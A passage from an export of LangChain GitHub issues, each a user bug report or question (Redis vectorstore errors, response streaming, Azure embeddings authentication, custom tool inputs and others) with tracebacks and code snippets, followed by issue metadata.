OS: Windows 10
### Who can help?
@hwchase17 @agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
using latest langchain with redis vectorstore return error TypeError
code here:
```
embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1)
rds = Redis.from_texts(texts, embeddings, redis_url="redis://localhost:6379", index_name=uid)
```
error stack:
```
---------------------------------------------------------------------------
IndexError Traceback (most recent call last)
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:1450, in ConnectionPool.get_connection(self, command_name, *keys, **options)
1449 try:
-> 1450 connection = self._available_connections.pop()
1451 except IndexError:
IndexError: pop from empty list
During handling of the above exception, another exception occurred:
TypeError Traceback (most recent call last)
Cell In[5], line 11
8 print("create vector store with id: {}".format(uid))
10 embeddings = OpenAIEmbeddings(model="text-embedding-ada-002", chunk_size=1)
---> 11 rds = Redis.from_texts(texts, embeddings, redis_url = "redis://localhost:6379",index_name=uid)
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:448, in Redis.from_texts(cls, texts, embedding, metadatas, index_name, content_key, metadata_key, vector_key, **kwargs)
419 @classmethod
420 def from_texts(
421 cls: Type[Redis],
(...)
429 **kwargs: Any,
430 ) -> Redis:
431 """Create a Redis vectorstore from raw documents.
432 This is a user-friendly interface that:
433 1. Embeds documents.
(...)
446 )
447 """
--> 448 instance, _ = cls.from_texts_return_keys(
449 texts=texts,
450 embedding=embedding,
451 metadatas=metadatas,
452 index_name=index_name,
453 content_key=content_key,
454 metadata_key=metadata_key,
455 vector_key=vector_key,
456 kwargs=kwargs,
457 )
458 return instance
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:399, in Redis.from_texts_return_keys(cls, texts, embedding, metadatas, index_name, content_key, metadata_key, vector_key, distance_metric, **kwargs)
396 index_name = uuid.uuid4().hex
398 # Create instance
--> 399 instance = cls(
400 redis_url=redis_url,
401 index_name=index_name,
402 embedding_function=embedding.embed_query,
403 content_key=content_key,
404 metadata_key=metadata_key,
405 vector_key=vector_key,
406 **kwargs,
407 )
409 # Create embeddings over documents
410 embeddings = embedding.embed_documents(texts)
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:138, in Redis.__init__(self, redis_url, index_name, embedding_function, content_key, metadata_key, vector_key, relevance_score_fn, **kwargs)
136 redis_client = redis.from_url(redis_url, **kwargs)
137 # check if redis has redisearch module installed
--> 138 _check_redis_module_exist(redis_client, REDIS_REQUIRED_MODULES)
139 except ValueError as e:
140 raise ValueError(f"Redis failed to connect: {e}")
File D:\Projects\openai\venv\Lib\site-packages\langchain\vectorstores\redis.py:48, in _check_redis_module_exist(client, required_modules)
46 def _check_redis_module_exist(client: RedisType, required_modules: List[dict]) -> None:
47 """Check if the correct Redis modules are installed."""
---> 48 installed_modules = client.module_list()
49 installed_modules = {
50 module[b"name"].decode("utf-8"): module for module in installed_modules
51 }
52 for module in required_modules:
File D:\Projects\openai\venv\Lib\site-packages\redis\commands\core.py:5781, in ModuleCommands.module_list(self)
5774 def module_list(self) -> ResponseT:
5775 """
5776 Returns a list of dictionaries containing the name and version of
5777 all loaded modules.
5778
5779 For more information see https://redis.io/commands/module-list
5780 """
-> 5781 return self.execute_command("MODULE LIST")
File D:\Projects\openai\venv\Lib\site-packages\redis\client.py:1266, in Redis.execute_command(self, *args, **options)
1264 pool = self.connection_pool
1265 command_name = args[0]
-> 1266 conn = self.connection or pool.get_connection(command_name, **options)
1268 try:
1269 return conn.retry.call_with_retry(
1270 lambda: self._send_command_parse_response(
1271 conn, command_name, *args, **options
1272 ),
1273 lambda error: self._disconnect_raise(conn, error),
1274 )
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:1452, in ConnectionPool.get_connection(self, command_name, *keys, **options)
1450 connection = self._available_connections.pop()
1451 except IndexError:
-> 1452 connection = self.make_connection()
1453 self._in_use_connections.add(connection)
1455 try:
1456 # ensure this connection is connected to Redis
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:1492, in ConnectionPool.make_connection(self)
1490 raise ConnectionError("Too many connections")
1491 self._created_connections += 1
-> 1492 return self.connection_class(**self.connection_kwargs)
File D:\Projects\openai\venv\Lib\site-packages\redis\connection.py:956, in Connection.__init__(self, host, port, socket_timeout, socket_connect_timeout, socket_keepalive, socket_keepalive_options, socket_type, **kwargs)
954 self.socket_keepalive_options = socket_keepalive_options or {}
955 self.socket_type = socket_type
--> 956 super().__init__(**kwargs)
TypeError: AbstractConnection.__init__() got an unexpected keyword argument 'kwargs'
```
### Expected behavior
I followed the instructions in the documentation and it ran fine before, but when I upgraded the langchain version to the latest version, it failed.
I believe this is related to https://github.com/hwchase17/langchain/pull/4857, am I using this method incorrectly now? I'm new to langchain. | vectorstore redis return TypeError | https://api.github.com/repos/langchain-ai/langchain/issues/4952/comments | 16 | 2023-05-19T00:53:22Z | 2023-12-12T16:31:54Z | https://github.com/langchain-ai/langchain/issues/4952 | 1,716,453,446 | 4,952 |
[
"hwchase17",
"langchain"
]
| ## Question
I'm interested in creating a conversational app using RetrievalQA that can also answer using external knowledge. However, I'm curious whether RetrievalQA supports replying in a streaming manner. I couldn't find any related articles, so I would like to ask everyone here. | Issue: Does RetrievalQA Support Streaming Replies? | https://api.github.com/repos/langchain-ai/langchain/issues/4950/comments | 30 | 2023-05-19T00:13:39Z | 2024-08-05T11:55:14Z | https://github.com/langchain-ai/langchain/issues/4950 | 1,716,429,367 | 4,950 |
[
"hwchase17",
"langchain"
]
| ### System Info
Colab standard Python 3 backend
### Who can help?
@O-Roma
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Open GraphQL example notebook in colab
2. Add langchain and openai to the pip install statement
3. add environment variable for OPENAI_API_KEY
4. Run the notebook
Got the following error
```
ValidationError: 3 validation errors for GraphQLAPIWrapper
gql_client
field required (type=value_error.missing)
gql_function
field required (type=value_error.missing)
__root__
Could not import gql python package. Please install it with `pip install gql`. (type=value_error)
```
### Expected behavior
The example should probably work. | GraphQL example notebook not working | https://api.github.com/repos/langchain-ai/langchain/issues/4946/comments | 4 | 2023-05-18T21:46:51Z | 2023-09-12T17:06:03Z | https://github.com/langchain-ai/langchain/issues/4946 | 1,716,309,110 | 4,946 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using Python Flask app for chat over data. So in the console I am getting streamable response directly from the OpenAI since I can enable streming with a flag streaming=True.
The problem is, that I can't “forward” the stream or “show” the strem than in my API call.
Code for the processing OpenAI and chain is:
```
def askQuestion(self, collection_id, question):
collection_name = "collection-" + str(collection_id)
self.llm = ChatOpenAI(model_name=self.model_name, temperature=self.temperature, openai_api_key=os.environ.get('OPENAI_API_KEY'), streaming=True, callback_manager=CallbackManager([StreamingStdOutCallbackHandler()]))
self.memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True, output_key='answer')
chroma_Vectorstore = Chroma(collection_name=collection_name, embedding_function=self.embeddingsOpenAi, client=self.chroma_client)
self.chain = ConversationalRetrievalChain.from_llm(self.llm, chroma_Vectorstore.as_retriever(similarity_search_with_score=True),
return_source_documents=True,verbose=VERBOSE,
memory=self.memory)
result = self.chain({"question": question})
res_dict = {
"answer": result["answer"],
}
res_dict["source_documents"] = []
for source in result["source_documents"]:
res_dict["source_documents"].append({
"page_content": source.page_content,
"metadata": source.metadata
})
return res_dict`
```
and the API route code:
```
def stream(collection_id, question):
completion = document_thread.askQuestion(collection_id, question)
for line in completion:
yield 'data: %s\n\n' % line
@app.route("/collection/<int:collection_id>/ask_question", methods=["POST"])
@stream_with_context
def ask_question(collection_id):
question = request.form["question"]
# response_generator = document_thread.askQuestion(collection_id, question)
# return jsonify(response_generator)
def stream(question):
completion = document_thread.askQuestion(collection_id, question)
for line in completion['answer']:
yield line
return Response(stream(question), mimetype='text/event-stream')
```
I am testing my endpoint with curl and I am passing flag -N to the curl, so I should get the streamable response, if it is possible.
When I make API call first the endpoint is waiting to process the data (I can see in my terminal in VS code the streamable answer) and when finished, I get everything displayed in one go.
Thanks
### Suggestion:
_No response_ | Issue: Stream a response from LangChain's OpenAI with Pyton Flask API | https://api.github.com/repos/langchain-ai/langchain/issues/4945/comments | 30 | 2023-05-18T21:41:40Z | 2024-03-07T21:26:59Z | https://github.com/langchain-ai/langchain/issues/4945 | 1,716,304,777 | 4,945 |
[
"hwchase17",
"langchain"
]
| ### System Info
0.1173
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1: Create Chroma vectorstore
2: Persist vectorstore
3: Use vectorstore once
4: Vectorstore no longer works, says "Index not found"
### Expected behavior
It works. | False "Index not found" messages | https://api.github.com/repos/langchain-ai/langchain/issues/4944/comments | 8 | 2023-05-18T21:10:59Z | 2023-09-19T16:10:07Z | https://github.com/langchain-ai/langchain/issues/4944 | 1,716,269,896 | 4,944 |
[
"hwchase17",
"langchain"
]
| ### Feature request
FLARE is providing some more accurate output when it works. I would love to switch to it. However, I do find that it often breaches the 4k context length.
I still don't have GPT4 access because I am a pleb (approve me plz OpenAI).
The stuff / map-reduce / refine chains used in the retrieval QandA would be great here. The FLARE chain looks like it is doing something akin to the "stuff" chain by just concatenating all the documents it found.
It would be nice if the LLMCombine chain was optional and defaulted to "stuff" like the retrieval chains do. This could be an option to handle context window issues when using FLARE. Ideally the same API followed, were users just pass the "chain_type" kwarg.
The 4k context window is unfortunately making FLARE unworkable.
P.S. also interested in seeing if sources could be added to FLARE.
### Motivation
I want to switch my retreival chain to be FLARE based (ideally with sources in the future). However, the context window limitations are making it unworkable at the moment. I am not even using chat_history.
### Your contribution
Happy to work with someone on this to raise a PR. | FLARE | Add CombineChain to handle long context | https://api.github.com/repos/langchain-ai/langchain/issues/4943/comments | 3 | 2023-05-18T20:04:50Z | 2023-09-15T16:12:36Z | https://github.com/langchain-ai/langchain/issues/4943 | 1,716,194,737 | 4,943 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version 0.0.162
python: 3.10
My all .eml email files are of 4.99 GB in total. Number of Documents generated are 5900000 .. and there are around 7 million tokens generated .
I have 2 questions:
1) since the documents contain simple plain text, why are there so many tokens generated? I mean 7 million tokens :/
2) What can i do to reduce these number of tokens will data sampling help , should i index in batches of 1000?
code:
```
print('loading docs from directory ...')
loader = DirectoryLoader('./test2',loader_cls=UnstructuredEmailLoader)
raw_documents = loader.load()
print('loaded docs with length')
#Splitting documents into chunks
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=1000,
chunk_overlap=200,
)
documents = text_splitter.split_documents(raw_documents)
# Changing source to point to the original document
for x in documents:
x.page_content = x.page_content.replace("\n\n", " ")
x.page_content = x.page_content.replace("\n", " ")
x.metadata["source"] = x.metadata["source"].replace("test\\", "")
x.metadata["source"] = x.metadata["source"].replace("semails\\", "")
x.metadata["source"] = x.metadata["source"].replace("test2\\", "")
print(x)
# Creating index and saving it to disk
print("Creating index")
print("length of documents: "+str(len(documents)))
db = FAISS.from_documents(documents, embeddings )
print("Index created, saving to disk")
db.save_local("./index")
```
### Who can help?
@hwchase17
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
Token should not be more than a million | loading .eml Email files of 5 GB as documents generating large number of tokens (7 million) on index creation | https://api.github.com/repos/langchain-ai/langchain/issues/4942/comments | 1 | 2023-05-18T18:54:10Z | 2023-09-10T16:15:38Z | https://github.com/langchain-ai/langchain/issues/4942 | 1,716,110,918 | 4,942 |
[
"hwchase17",
"langchain"
]
| ### System Info
While loading an already existing index with existing openAI embeddings (data indexed using haystack framework)
```python
elastic_vector_search = ElasticVectorSearch(
elasticsearch_url=es_url,
index_name=index,
embedding=embeddings
)
```
Running below command
```python
elastic_vector_search.similarity_search(query)
```
gives bellow error
```python
---------------------------------------------------------------------------
BadRequestError Traceback (most recent call last)
Cell In[88], line 2
1 query = "adnoc distribution"
----> 2 elastic_vector_search.similarity_search(query)
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/langchain/vectorstores/elastic_vector_search.py:206, in ElasticVectorSearch.similarity_search(self, query, k, filter, **kwargs)
194 def similarity_search(
195 self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any
196 ) -> List[Document]:
197 """Return docs most similar to query.
198
199 Args:
(...)
204 List of Documents most similar to the query.
205 """
--> 206 docs_and_scores = self.similarity_search_with_score(query, k, filter=filter)
207 documents = [d[0] for d in docs_and_scores]
208 return documents
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/langchain/vectorstores/elastic_vector_search.py:222, in ElasticVectorSearch.similarity_search_with_score(self, query, k, filter, **kwargs)
220 embedding = self.embedding.embed_query(query)
221 script_query = _default_script_query(embedding, filter)
--> 222 response = self.client.search(index=self.index_name, query=script_query, size=k)
223 hits = [hit for hit in response["hits"]["hits"]]
224 docs_and_scores = [
225 (
226 Document(
(...)
232 for hit in hits
233 ]
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/elasticsearch/_sync/client/utils.py:414, in _rewrite_parameters.<locals>.wrapper.<locals>.wrapped(*args, **kwargs)
411 except KeyError:
412 pass
--> 414 return api(*args, **kwargs)
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/elasticsearch/_sync/client/__init__.py:3857, in Elasticsearch.search(self, index, aggregations, aggs, allow_no_indices, allow_partial_search_results, analyze_wildcard, analyzer, batched_reduce_size, ccs_minimize_roundtrips, collapse, default_operator, df, docvalue_fields, error_trace, expand_wildcards, explain, ext, fields, filter_path, from_, highlight, human, ignore_throttled, ignore_unavailable, indices_boost, knn, lenient, max_concurrent_shard_requests, min_compatible_shard_node, min_score, pit, post_filter, pre_filter_shard_size, preference, pretty, profile, q, query, request_cache, rescore, rest_total_hits_as_int, routing, runtime_mappings, script_fields, scroll, search_after, search_type, seq_no_primary_term, size, slice, sort, source, source_excludes, source_includes, stats, stored_fields, suggest, suggest_field, suggest_mode, suggest_size, suggest_text, terminate_after, timeout, track_scores, track_total_hits, typed_keys, version)
3855 if __body is not None:
3856 __headers["content-type"] = "application/json"
-> 3857 return self.perform_request( # type: ignore[return-value]
3858 "POST", __path, params=__query, headers=__headers, body=__body
3859 )
File /opt/homebrew/Caskroom/miniforge/base/envs/langchain/lib/python3.11/site-packages/elasticsearch/_sync/client/_base.py:320, in BaseClient.perform_request(self, method, path, params, headers, body)
317 except (ValueError, KeyError, TypeError):
318 pass
--> 320 raise HTTP_EXCEPTIONS.get(meta.status, ApiError)(
321 message=message, meta=meta, body=resp_body
322 )
324 # 'X-Elastic-Product: Elasticsearch' should be on every 2XX response.
325 if not self._verified_elasticsearch:
326 # If the header is set we mark the server as verified.
BadRequestError: BadRequestError(400, 'search_phase_execution_exception', 'runtime error')
```
If an index with embeddings(in this case openAI) is not created using langchain , will it not be loaded as a vector_store ?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run the steps shown earlier
### Expected behavior
Eventhough we do not create an elasticsearch index using langchain, an existing index with vector embeddings, should be able to load. | Error while loading saved index in Elasticsearch | https://api.github.com/repos/langchain-ai/langchain/issues/4940/comments | 1 | 2023-05-18T17:34:22Z | 2023-09-15T22:12:58Z | https://github.com/langchain-ai/langchain/issues/4940 | 1,716,005,900 | 4,940 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
The author of the issue/PR cannot add a label to it.
Of course, some labels should be accessible only with high privilege (like `bug`(?), `close`) but some should be accessible for everybody. Like `agent`, `chains`, and `documentation`.
The label is a powerful tool to filter out the issues/PR but is not accessible.
### Suggestion:
Allow the use of most of the `labels` to everybody in `Issues`/`pull requests`. | Issue: Filling an issue or PR with `label(s)` | https://api.github.com/repos/langchain-ai/langchain/issues/4934/comments | 3 | 2023-05-18T16:09:57Z | 2023-08-31T17:08:05Z | https://github.com/langchain-ai/langchain/issues/4934 | 1,715,894,918 | 4,934 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain-0.0.173
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am using the same code provided here. [](https://python.langchain.com/en/latest/modules/models/text_embedding/examples/azureopenai.html)
My code is like:
```
from langchain.embeddings.openai import OpenAIEmbeddings
# open ai key
openai.api_type = "azure"
openai.api_version = "2023-03-15-preview"
openai.api_base = 'https://xxxxxopenai.openai.azure.com/'
openai.api_key = "xxxxxxxxxxxxxxxxxxxxxxxx"
embeddings = OpenAIEmbeddings(deployment='Embedding_Generation' )
print(embeddings.embed_query("Hi How are You"))
```
I also tried other options but getting the same error on print statement.
AuthenticationError: Access denied due to invalid subscription key or wrong API endpoint. Make sure to provide a valid key for an active subscription and use a correct regional API endpoint for your resource.
### Expected behavior
I want to generate the embneddings. | langchain AzureOpenAI Embeddings | https://api.github.com/repos/langchain-ai/langchain/issues/4925/comments | 3 | 2023-05-18T12:56:40Z | 2023-05-19T20:11:46Z | https://github.com/langchain-ai/langchain/issues/4925 | 1,715,594,468 | 4,925 |
[
"hwchase17",
"langchain"
]
| ### System Info
The llm model using default davinci example provided in https://python.langchain.com/en/latest/ecosystem/wandb_tracking.html is OK. But seems not able to handle ChatOpenAI object. How to solve this?
The code is as below:
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code:
```python
from langchain.callbacks import WandbCallbackHandler, StdOutCallbackHandler
wandb_callback = WandbCallbackHandler(
job_type="inference",
project="langchain_callback_demo",
group="test_group",
name="llm",
tags=["test"],
)
callbacks = [StdOutCallbackHandler(), wandb_callback]
chat = ChatOpenAI(model_name='gpt-3.5-turbo', callbacks=callbacks, temperature=0, request_timeout=20)
resp = chat([HumanMessage(content="Write me 4 greeting sentences.")])
wandb_callback.flush_tracker(chat, name="simple")
```
### Expected behavior
Error:
```
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
Cell In[3], line 4
2 chat = ChatOpenAI(model_name='gpt-3.5-turbo', callbacks=callbacks, temperature=0, request_timeout=20)
3 resp = chat([HumanMessage(content="Write me 4 greeting sentences.")])
----> 4 wandb_callback.flush_tracker(chat, name="simple")
File [~/miniconda3/envs/lang/lib/python3.11/site-packages/langchain/callbacks/wandb_callback.py:560](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/ocean/projects/behavior/~/miniconda3/envs/lang/lib/python3.11/site-packages/langchain/callbacks/wandb_callback.py:560), in WandbCallbackHandler.flush_tracker(self, langchain_asset, reset, finish, job_type, project, entity, tags, group, name, notes, visualize, complexity_metrics)
558 model_artifact.add(session_analysis_table, name="session_analysis")
559 try:
--> 560 langchain_asset.save(langchain_asset_path)
561 model_artifact.add_file(str(langchain_asset_path))
562 model_artifact.metadata = load_json_to_dict(langchain_asset_path)
AttributeError: 'ChatOpenAI' object has no attribute 'save'
``` | Seems Langchain Wandb can not handle the ChatOpenAI object? | https://api.github.com/repos/langchain-ai/langchain/issues/4922/comments | 6 | 2023-05-18T11:51:57Z | 2023-09-14T03:11:01Z | https://github.com/langchain-ai/langchain/issues/4922 | 1,715,504,366 | 4,922 |
[
"hwchase17",
"langchain"
]
| ### System Info
windows 11, anaconda, langchain .__version__: '0.0.171' python 3.9.16
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Hi, I am trying to build a custom tool that will take some text as input prompt it with some specific prompt and output the prompted text. When doing so the output text is correct do I get an error in the end here is the code:
```python
@tool("optimistic_string")
def optimistic_string(input_string: str) -> str:
"""use when unsure about other options"""
# Add your logic to process the input_string and generate the output_string
prompt = "Rewrite the following sentence with a more optimistic tone: {{input_string}}"
output_string = llm.generate(prompt) # Replace this with the actual call to the language model
return "output_string"
tools = [optimistic_string]
# Initialize the agent with the custom tool
llm = ChatOpenAI(temperature=0)
agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True)
# Run the agent with an example input
result = agent.run( "I'm not sure about the future.")
print(result)
```
Here is the error:
```
> Entering new AgentExecutor chain...
I should try to be optimistic and see the positive possibilities.
Action: optimistic_string
Action Input: "I'm excited to see what the future holds!"Traceback (most recent call last):
…
File ~\anaconda3\envs\aagi\lib\site-packages\langchain\chat_models\openai.py:307 in <listcomp>
message_dicts = [_convert_message_to_dict(m) for m in messages]
File ~\anaconda3\envs\aagi\lib\site-packages\langchain\chat_models\openai.py:92 in _convert_message_to_dict
raise ValueError(f"Got unknown type {message}")
ValueError: Got unknown type R
```
### Expected behavior
Just output the text | ValueError: Got unknown type R | https://api.github.com/repos/langchain-ai/langchain/issues/4921/comments | 1 | 2023-05-18T11:32:44Z | 2023-05-18T14:51:39Z | https://github.com/langchain-ai/langchain/issues/4921 | 1,715,480,235 | 4,921 |
[
"hwchase17",
"langchain"
]
| ### System Info
Below is the code which I have written
```
from langchain.document_loaders import ImageCaptionLoader
import transformers
import pytessearct
pytesseract.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'
loader = ImageCaptionLoader(r"C:\Users\q,k and v in self-attention.PNG")
list_docs = loader.load()
list_docs
```
The above code is returning the below output, it is saying transformers package not found, but it is already installed and import is running.
```
---------------------------------------------------------------------------
ImportError Traceback (most recent call last)
File ~\anaconda3\lib\site-packages\langchain\document_loaders\image_captions.py:40, in ImageCaptionLoader.load(self)
39 try:
---> 40 from transformers import BlipForConditionalGeneration, BlipProcessor
41 except ImportError:
ImportError: cannot import name 'BlipForConditionalGeneration' from 'transformers' (C:\Users\nithi\anaconda3\lib\site-packages\transformers\__init__.py)
During handling of the above exception, another exception occurred:
ValueError Traceback (most recent call last)
Cell In[4], line 2
1 loader = ImageCaptionLoader(r"C:\Users\q,k and v in self-attention.PNG")
----> 2 list_docs = loader.load()
3 list_docs
File ~\anaconda3\lib\site-packages\langchain\document_loaders\image_captions.py:42, in ImageCaptionLoader.load(self)
40 from transformers import BlipForConditionalGeneration, BlipProcessor
41 except ImportError:
---> 42 raise ValueError(
43 "transformers package not found, please install with"
44 "`pip install transformers`"
45 )
47 processor = BlipProcessor.from_pretrained(self.blip_processor)
48 model = BlipForConditionalGeneration.from_pretrained(self.blip_model)
ValueError: transformers package not found, please install with`pip install transformers`
```
Can anyone help me with this?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
I'm unable to load the image using ImageCaptionLoader. | Unable to use ImageCaptionLoader function | https://api.github.com/repos/langchain-ai/langchain/issues/4919/comments | 4 | 2023-05-18T11:24:00Z | 2023-11-01T16:07:25Z | https://github.com/langchain-ai/langchain/issues/4919 | 1,715,469,726 | 4,919 |
[
"hwchase17",
"langchain"
]
| ### System Info
How to enable precise formatting for the input of a tools utility class, such as accepting data of type list[str]? Is this achievable?
```python
class QueryTokenAssetsInput(BaseModel):
addresses: str = Field(description="like 'address1,address2,address3',should be a list of addresses")
@tool("query_token_assets", return_direct=True, args_schema=QueryTokenAssetsInput)
def query_prices(addresses: str):
"""query the prices of tokens"""
addresses = re.findall(r'"([^"]*)', addresses)[0].split(',')
addresses = [address.replace(" ",'') for address in addresses]
data = fetcher.query_tokens_price(addresses=addresses)
return data
```
Just like the code snippet provided above, when the input "addresses" is a string and the question posed to the large model is about `the price of "0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599, 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48"`, it interprets "addresses" as `'addresses = "0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599,0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84'"`. This requires me to use regular expressions to parse the string and convert it into `['0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599', '0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84']`, but sometimes "addresses" is not very consistent, leading to bugs in my regular expression parsing. How can I make the input for "addresses" more stable? Is it possible to directly convert "addresses" into a list[str]?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.tools.base import tool, BaseModel, Field
import os
from typing import List
import re
class QueryTokenAssetsInput(BaseModel):
addresses: str = Field(description="like 'address1,address2,address3',should be a list of addresses")
@tool("query_token_assets", return_direct=True, args_schema=QueryTokenAssetsInput)
def query_prices(addresses: str):
"""query the prices of tokens"""
addresses = re.findall(r'"([^"]*)', addresses)[0].split(',')
addresses = [address.replace(" ",'') for address in addresses]
return data
if __name__ == "__main__":
import json
with open("langchain/api_key.json", "r") as f:
api_key = json.load(f)
os.environ["OPENAI_API_KEY"] = api_key["OPANAI_API_KEY"]
from langchain.agents import AgentType, initialize_agent
from langchain.chat_models import ChatOpenAI
llm = ChatOpenAI(temperature=0)
agent = initialize_agent([query_prices, get_file_sizes], llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True)
data = agent.run("the price of 0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599, 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48")
print(data)
### Expected behavior
How can I ensure that the input for "addresses" remains stable and directly becomes a list[str] type? | How to enable precise formatting for the input of a tools utility class, such as accepting data of type list[str]? Is this achievable? | https://api.github.com/repos/langchain-ai/langchain/issues/4918/comments | 4 | 2023-05-18T10:10:20Z | 2023-10-08T07:25:51Z | https://github.com/langchain-ai/langchain/issues/4918 | 1,715,371,728 | 4,918 |
[
"hwchase17",
"langchain"
]
| ### System Info
Working on Windows machine using a conda environment.
aiohttp==3.8.4
aiosignal==1.3.1
altair==4.2.2
anyio @ file:///C:/ci_311/anyio_1676425491996/work/dist
argilla==1.6.0
argon2-cffi @ file:///opt/conda/conda-bld/argon2-cffi_1645000214183/work
argon2-cffi-bindings @ file:///C:/ci_311/argon2-cffi-bindings_1676424443321/work
asttokens @ file:///opt/conda/conda-bld/asttokens_1646925590279/work
async-timeout==4.0.2
attrs @ file:///C:/ci_311/attrs_1676422272484/work
Babel @ file:///C:/ci_311/babel_1676427169844/work
